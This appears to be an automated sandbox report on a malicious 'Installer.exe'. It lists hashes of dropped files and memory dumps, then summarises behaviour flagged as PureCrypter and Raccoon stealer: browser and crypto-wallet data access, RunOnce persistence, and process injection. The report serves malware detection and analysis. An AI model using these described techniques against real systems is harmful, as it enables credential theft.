MD5 3319432d3a694a481f5672fa9eb743d0
SHA1 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9
SHA256 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693
SHA512 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f

memory/1800-70-0x00000000002E0000-0x00000000002EC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.dll

MD5 4d65e6eb25db2ce61f4a7a48d9f6082a
SHA1 130abbae19f227b0ef4f278e90398b3b3c7c2eff
SHA256 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a
SHA512 b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb

\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.dll

MD5 4d65e6eb25db2ce61f4a7a48d9f6082a
SHA1 130abbae19f227b0ef4f278e90398b3b3c7c2eff
SHA256 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a
SHA512 b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb

\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.dll

MD5 4d65e6eb25db2ce61f4a7a48d9f6082a
SHA1 130abbae19f227b0ef4f278e90398b3b3c7c2eff
SHA256 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a
SHA512 b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb

memory/1800-74-0x0000000004EC0000-0x000000000559A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\Ninject.dll

MD5 ce80365e2602b7cff0222e0db395428c
SHA1 50c9625eda1d156c9d7a672839e9faaea1dffdbd
SHA256 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5
SHA512 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3

memory/1800-78-0x0000000000450000-0x0000000000478000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS8126C44C\Ninject.dll

MD5 ce80365e2602b7cff0222e0db395428c
SHA1 50c9625eda1d156c9d7a672839e9faaea1dffdbd
SHA256 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5
SHA512 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3

\Users\Admin\AppData\Local\Temp\7zS8126C44C\Ninject.dll

MD5 ce80365e2602b7cff0222e0db395428c
SHA1 50c9625eda1d156c9d7a672839e9faaea1dffdbd
SHA256 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5
SHA512 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3

\Users\Admin\AppData\Local\Temp\7zS8126C44C\Ninject.dll

MD5 ce80365e2602b7cff0222e0db395428c
SHA1 50c9625eda1d156c9d7a672839e9faaea1dffdbd
SHA256 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5
SHA512 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3

\Users\Admin\AppData\Local\Temp\7zS8126C44C\Ninject.dll

MD5 ce80365e2602b7cff0222e0db395428c
SHA1 50c9625eda1d156c9d7a672839e9faaea1dffdbd
SHA256 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5
SHA512 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3

C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\HtmlAgilityPack.dll

MD5 7874850410e21b5f48bfe34174fb318c
SHA1 19522b1b9d932aa89df580c73ef629007ec32b6f
SHA256 c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1
SHA512 dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa

\Users\Admin\AppData\Local\Temp\7zS8126C44C\HtmlAgilityPack.dll

MD5 7874850410e21b5f48bfe34174fb318c
SHA1 19522b1b9d932aa89df580c73ef629007ec32b6f
SHA256 c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1
SHA512 dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa

memory/1800-84-0x0000000000B40000-0x0000000000B6C000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS8126C44C\HtmlAgilityPack.dll

MD5 7874850410e21b5f48bfe34174fb318c
SHA1 19522b1b9d932aa89df580c73ef629007ec32b6f
SHA256 c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1
SHA512 dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa

\Users\Admin\AppData\Local\Temp\7zS8126C44C\HtmlAgilityPack.dll

MD5 7874850410e21b5f48bfe34174fb318c
SHA1 19522b1b9d932aa89df580c73ef629007ec32b6f
SHA256 c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1
SHA512 dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa

\Users\Admin\AppData\Local\Temp\7zS8126C44C\HtmlAgilityPack.dll

MD5 7874850410e21b5f48bfe34174fb318c
SHA1 19522b1b9d932aa89df580c73ef629007ec32b6f
SHA256 c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1
SHA512 dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa

\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.dll

MD5 4d65e6eb25db2ce61f4a7a48d9f6082a
SHA1 130abbae19f227b0ef4f278e90398b3b3c7c2eff
SHA256 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a
SHA512 b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb

\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.dll

MD5 4d65e6eb25db2ce61f4a7a48d9f6082a
SHA1 130abbae19f227b0ef4f278e90398b3b3c7c2eff
SHA256 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a
SHA512 b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb

C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\MyDownloader.Core.dll

MD5 f931e960cc4ed0d2f392376525ff44db
SHA1 1895aaa8f5b8314d8a4c5938d1405775d3837109
SHA256 1c1c5330ea35f518bf85fad69dc2da1a98a4dfeadbf6ac0ba0ac7cc51bbcc870
SHA512 7fa5e582ad1bb094cbbb68b1db301dcf360e180eb58f8d726a112133277ceaa39660c6d4b3248c19a8b5767a4ae09f4597535711d789ca4f9f334a204d87ffe0

memory/1800-101-0x0000000000C80000-0x0000000000C92000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS8126C44C\MyDownloader.Core.dll

MD5 f931e960cc4ed0d2f392376525ff44db
SHA1 1895aaa8f5b8314d8a4c5938d1405775d3837109
SHA256 1c1c5330ea35f518bf85fad69dc2da1a98a4dfeadbf6ac0ba0ac7cc51bbcc870
SHA512 7fa5e582ad1bb094cbbb68b1db301dcf360e180eb58f8d726a112133277ceaa39660c6d4b3248c19a8b5767a4ae09f4597535711d789ca4f9f334a204d87ffe0

\Users\Admin\AppData\Local\Temp\7zS8126C44C\MyDownloader.Core.dll

MD5 f931e960cc4ed0d2f392376525ff44db
SHA1 1895aaa8f5b8314d8a4c5938d1405775d3837109
SHA256 1c1c5330ea35f518bf85fad69dc2da1a98a4dfeadbf6ac0ba0ac7cc51bbcc870
SHA512 7fa5e582ad1bb094cbbb68b1db301dcf360e180eb58f8d726a112133277ceaa39660c6d4b3248c19a8b5767a4ae09f4597535711d789ca4f9f334a204d87ffe0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 fc4666cbca561e864e7fdf883a9e6661
SHA1 2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5
SHA256 10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b
SHA512 c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4b16d9698a8ce99020662ace510a8781
SHA1 ff92d711e080d277890229da47bc1ce067feff03
SHA256 96c886fd7e66a00051fd1c6c823315949204ed8ebb24c24c13198c5969c9c1f2
SHA512 b59e1e76dadaefe8a84815e3f39b4b6169132e6b923935bcd4e5ec28ebba8bde958f1462525cefec0110a9283090f636278680a6bfd03858611e366ab0cc178a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7988caec2e24d194d7dcecb39a3f45f8
SHA1 097968f55c9d1b4368dedd13b34a741e5e8ab703
SHA256 6a135dcc25bb7f05843e9eaf9b8c927cac218bd478c26dc4fb56960e1cbd42ad
SHA512 1cb4bd977c023a4a2de3c87a09343f3193358d8dd408babe838dcdc44b58582aa6e0dd932a81c135ba93a1462a6e99a290f941b8a83253ba1d6d58658ec39f35

C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\Newtonsoft.Json.dll

MD5 3c4d2f6fd240dc804e10bbb5f16c6182
SHA1 30d66e6a1ead9541133bad2c715c1971ae943196
SHA256 1f7a328eb4fa73df5d2996202f5dab02530b0339458137774c72731b9f85ca2e
SHA512 0657f0ab1d7fc9730d4bf6b8c8373f512d57a34063bcfa1f93a803b0afe2a93219da5dc679414dd155956bd696cb7547fc09663f8891eb9b03d9c93b3c1fe95d

\Users\Admin\AppData\Local\Temp\7zS8126C44C\Newtonsoft.Json.dll

MD5 3c4d2f6fd240dc804e10bbb5f16c6182
SHA1 30d66e6a1ead9541133bad2c715c1971ae943196
SHA256 1f7a328eb4fa73df5d2996202f5dab02530b0339458137774c72731b9f85ca2e
SHA512 0657f0ab1d7fc9730d4bf6b8c8373f512d57a34063bcfa1f93a803b0afe2a93219da5dc679414dd155956bd696cb7547fc09663f8891eb9b03d9c93b3c1fe95d

memory/1800-110-0x0000000006490000-0x000000000650C000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS8126C44C\Newtonsoft.Json.dll

MD5 3c4d2f6fd240dc804e10bbb5f16c6182
SHA1 30d66e6a1ead9541133bad2c715c1971ae943196
SHA256 1f7a328eb4fa73df5d2996202f5dab02530b0339458137774c72731b9f85ca2e
SHA512 0657f0ab1d7fc9730d4bf6b8c8373f512d57a34063bcfa1f93a803b0afe2a93219da5dc679414dd155956bd696cb7547fc09663f8891eb9b03d9c93b3c1fe95d

\Users\Admin\AppData\Local\Temp\7zS8126C44C\Newtonsoft.Json.dll

MD5 3c4d2f6fd240dc804e10bbb5f16c6182
SHA1 30d66e6a1ead9541133bad2c715c1971ae943196
SHA256 1f7a328eb4fa73df5d2996202f5dab02530b0339458137774c72731b9f85ca2e
SHA512 0657f0ab1d7fc9730d4bf6b8c8373f512d57a34063bcfa1f93a803b0afe2a93219da5dc679414dd155956bd696cb7547fc09663f8891eb9b03d9c93b3c1fe95d

\Users\Admin\AppData\Local\Temp\7zS8126C44C\Newtonsoft.Json.dll

MD5 3c4d2f6fd240dc804e10bbb5f16c6182
SHA1 30d66e6a1ead9541133bad2c715c1971ae943196
SHA256 1f7a328eb4fa73df5d2996202f5dab02530b0339458137774c72731b9f85ca2e
SHA512 0657f0ab1d7fc9730d4bf6b8c8373f512d57a34063bcfa1f93a803b0afe2a93219da5dc679414dd155956bd696cb7547fc09663f8891eb9b03d9c93b3c1fe95d

\Users\Admin\AppData\Local\Temp\GenericSetup.exe_1673806424\sciter32.dll

MD5 b431083586e39d018e19880ad1a5ce8f
SHA1 3bbf957ab534d845d485a8698accc0a40b63cedd
SHA256 b525fdcc32c5a359a7f5738a30eff0c6390734d8a2c987c62e14c619f99d406b
SHA512 7805a3464fcc3ac4ea1258e2412180c52f2af40a79b540348486c830a20c2bbed337bbf5f4a8926b3ef98c63c87747014f5b43c35f7ec4e7a3693b9dbd0ae67b

C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\MyDownloader.Extension.dll

MD5 28f1996059e79df241388bd9f89cf0b1
SHA1 6ad6f7cde374686a42d9c0fcebadaf00adf21c76
SHA256 c3f8a46e81f16bbfc75de44dc95f0d145213c8af0006bb097950ac4d1562f5ce
SHA512 9654d451cb2f184548649aa04b902f5f6aff300c6f03b9261ee3be5405527b4f23862d8988f9811987da22e386813e844e7c5068fd6421c91551f5b33c625f29

\Users\Admin\AppData\Local\Temp\7zS8126C44C\MyDownloader.Extension.dll

MD5 28f1996059e79df241388bd9f89cf0b1
SHA1 6ad6f7cde374686a42d9c0fcebadaf00adf21c76
SHA256 c3f8a46e81f16bbfc75de44dc95f0d145213c8af0006bb097950ac4d1562f5ce
SHA512 9654d451cb2f184548649aa04b902f5f6aff300c6f03b9261ee3be5405527b4f23862d8988f9811987da22e386813e844e7c5068fd6421c91551f5b33c625f29

memory/1800-117-0x0000000004CB0000-0x0000000004CDE000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS8126C44C\MyDownloader.Extension.dll

MD5 28f1996059e79df241388bd9f89cf0b1
SHA1 6ad6f7cde374686a42d9c0fcebadaf00adf21c76
SHA256 c3f8a46e81f16bbfc75de44dc95f0d145213c8af0006bb097950ac4d1562f5ce
SHA512 9654d451cb2f184548649aa04b902f5f6aff300c6f03b9261ee3be5405527b4f23862d8988f9811987da22e386813e844e7c5068fd6421c91551f5b33c625f29

\Users\Admin\AppData\Local\setup10298.exe

MD5 369acf60d8b5ed6168c74955ee04654f
SHA1 1753fff63efa6ed5ad30ede6b959261ac67dd13e
SHA256 3ff8ec8f9f27a27f414a90bfed5b7f5a3c118b33cf0f80aeb7026e0a53e26632
SHA512 2582b3b4525321fece978710403e4bd4dd6e9f0869de1fec784e4e79ac98e8c6498a601c9db45d5af4f1b99e3a2cc07b9e3ec18144e18ce82b41eb64ce4eb643

memory/840-121-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\setup10298.exe

MD5 369acf60d8b5ed6168c74955ee04654f
SHA1 1753fff63efa6ed5ad30ede6b959261ac67dd13e
SHA256 3ff8ec8f9f27a27f414a90bfed5b7f5a3c118b33cf0f80aeb7026e0a53e26632
SHA512 2582b3b4525321fece978710403e4bd4dd6e9f0869de1fec784e4e79ac98e8c6498a601c9db45d5af4f1b99e3a2cc07b9e3ec18144e18ce82b41eb64ce4eb643

\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe

MD5 85b0a721491803f8f0208a1856241562
SHA1 90beb8d419b83bd76924826725a14c03b3e6533f
SHA256 18be33f7c9f28b0a514f3f40983f452f476470691b1be4f2aba5ba5e06c6a345
SHA512 8ff86e4b4d9cb5e2e88826a822457cb863262e3b73645c0c3309f13fb496997e53005ebe1825c6f92463c6642ec9abc6bbe359b35410b0621649b8d3aaf66c71

memory/1516-125-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe

MD5 85b0a721491803f8f0208a1856241562
SHA1 90beb8d419b83bd76924826725a14c03b3e6533f
SHA256 18be33f7c9f28b0a514f3f40983f452f476470691b1be4f2aba5ba5e06c6a345
SHA512 8ff86e4b4d9cb5e2e88826a822457cb863262e3b73645c0c3309f13fb496997e53005ebe1825c6f92463c6642ec9abc6bbe359b35410b0621649b8d3aaf66c71

C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe.config

MD5 fd63ee3928edd99afc5bdf17e4f1e7b6
SHA1 1b40433b064215ea6c001332c2ffa093b1177875
SHA256 2a2ddbdc4600e829ad756fd5e84a79c0401fa846ad4f2f2fb235b410e82434a9
SHA512 1925cde90ee84db1e5c15fa774ee5f10fa368948df7643259b03599ad58cfce9d409fd2cd752ff4cbca60b4bbe92b184ff92a0c6e8b78849c4497d38266bd3b4

C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe

MD5 85b0a721491803f8f0208a1856241562
SHA1 90beb8d419b83bd76924826725a14c03b3e6533f
SHA256 18be33f7c9f28b0a514f3f40983f452f476470691b1be4f2aba5ba5e06c6a345
SHA512 8ff86e4b4d9cb5e2e88826a822457cb863262e3b73645c0c3309f13fb496997e53005ebe1825c6f92463c6642ec9abc6bbe359b35410b0621649b8d3aaf66c71

memory/1516-130-0x00000000000D0000-0x00000000000DA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.LastScreen.dll

MD5 3319432d3a694a481f5672fa9eb743d0
SHA1 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9
SHA256 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693
SHA512 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f

\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.LastScreen.dll

MD5 3319432d3a694a481f5672fa9eb743d0
SHA1 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9
SHA256 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693
SHA512 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f

memory/1516-134-0x0000000000370000-0x000000000037C000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.LastScreen.dll

MD5 3319432d3a694a481f5672fa9eb743d0
SHA1 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9
SHA256 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693
SHA512 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f

C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.dll

MD5 4d65e6eb25db2ce61f4a7a48d9f6082a
SHA1 130abbae19f227b0ef4f278e90398b3b3c7c2eff
SHA256 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a
SHA512 b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb

\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.dll

MD5 4d65e6eb25db2ce61f4a7a48d9f6082a
SHA1 130abbae19f227b0ef4f278e90398b3b3c7c2eff
SHA256 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a
SHA512 b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb

\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.dll

MD5 4d65e6eb25db2ce61f4a7a48d9f6082a
SHA1 130abbae19f227b0ef4f278e90398b3b3c7c2eff
SHA256 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a
SHA512 b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb

memory/1516-138-0x0000000004E60000-0x000000000553A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8433607D\Ninject.dll

MD5 ce80365e2602b7cff0222e0db395428c
SHA1 50c9625eda1d156c9d7a672839e9faaea1dffdbd
SHA256 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5
SHA512 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3

\Users\Admin\AppData\Local\Temp\7zS8433607D\Ninject.dll

MD5 ce80365e2602b7cff0222e0db395428c
SHA1 50c9625eda1d156c9d7a672839e9faaea1dffdbd
SHA256 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5
SHA512 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3

\Users\Admin\AppData\Local\Temp\7zS8433607D\Ninject.dll

MD5 ce80365e2602b7cff0222e0db395428c
SHA1 50c9625eda1d156c9d7a672839e9faaea1dffdbd
SHA256 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5
SHA512 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3

\Users\Admin\AppData\Local\Temp\7zS8433607D\Ninject.dll

MD5 ce80365e2602b7cff0222e0db395428c
SHA1 50c9625eda1d156c9d7a672839e9faaea1dffdbd
SHA256 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5
SHA512 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3

\Users\Admin\AppData\Local\Temp\7zS8433607D\HtmlAgilityPack.dll

MD5 7874850410e21b5f48bfe34174fb318c
SHA1 19522b1b9d932aa89df580c73ef629007ec32b6f
SHA256 c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1
SHA512 dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa

\Users\Admin\AppData\Local\Temp\7zS8433607D\HtmlAgilityPack.dll

MD5 7874850410e21b5f48bfe34174fb318c
SHA1 19522b1b9d932aa89df580c73ef629007ec32b6f
SHA256 c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1
SHA512 dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa

\Users\Admin\AppData\Local\Temp\7zS8433607D\HtmlAgilityPack.dll

MD5 7874850410e21b5f48bfe34174fb318c
SHA1 19522b1b9d932aa89df580c73ef629007ec32b6f
SHA256 c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1
SHA512 dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa

\Users\Admin\AppData\Local\Temp\7zS8433607D\HtmlAgilityPack.dll

MD5 7874850410e21b5f48bfe34174fb318c
SHA1 19522b1b9d932aa89df580c73ef629007ec32b6f
SHA256 c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1
SHA512 dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa

memory/1516-148-0x00000000006C0000-0x00000000006EC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8433607D\HtmlAgilityPack.dll

MD5 7874850410e21b5f48bfe34174fb318c
SHA1 19522b1b9d932aa89df580c73ef629007ec32b6f
SHA256 c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1
SHA512 dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa

memory/1516-142-0x00000000003E0000-0x0000000000408000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS8433607D\Ninject.dll

MD5 ce80365e2602b7cff0222e0db395428c
SHA1 50c9625eda1d156c9d7a672839e9faaea1dffdbd
SHA256 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5
SHA512 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3

Analysis: behavioral4

Detonation Overview

Submitted

2023-01-15 17:11

Reported

2023-01-15 17:16

Platform

win10v2004-20221111-en

Max time kernel

124s

Max time network

138s

Command Line

"C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe"

Signatures

PureCrypter

loader downloader purecrypter

Raccoon

stealer raccoon

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe N/A

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 364 set thread context of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4460 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
PID 4460 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
PID 4460 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
PID 364 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 364 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 364 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 364 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Windows\SysWOW64\cmd.exe
PID 364 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Windows\SysWOW64\cmd.exe
PID 364 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Windows\SysWOW64\cmd.exe
PID 364 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
PID 364 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
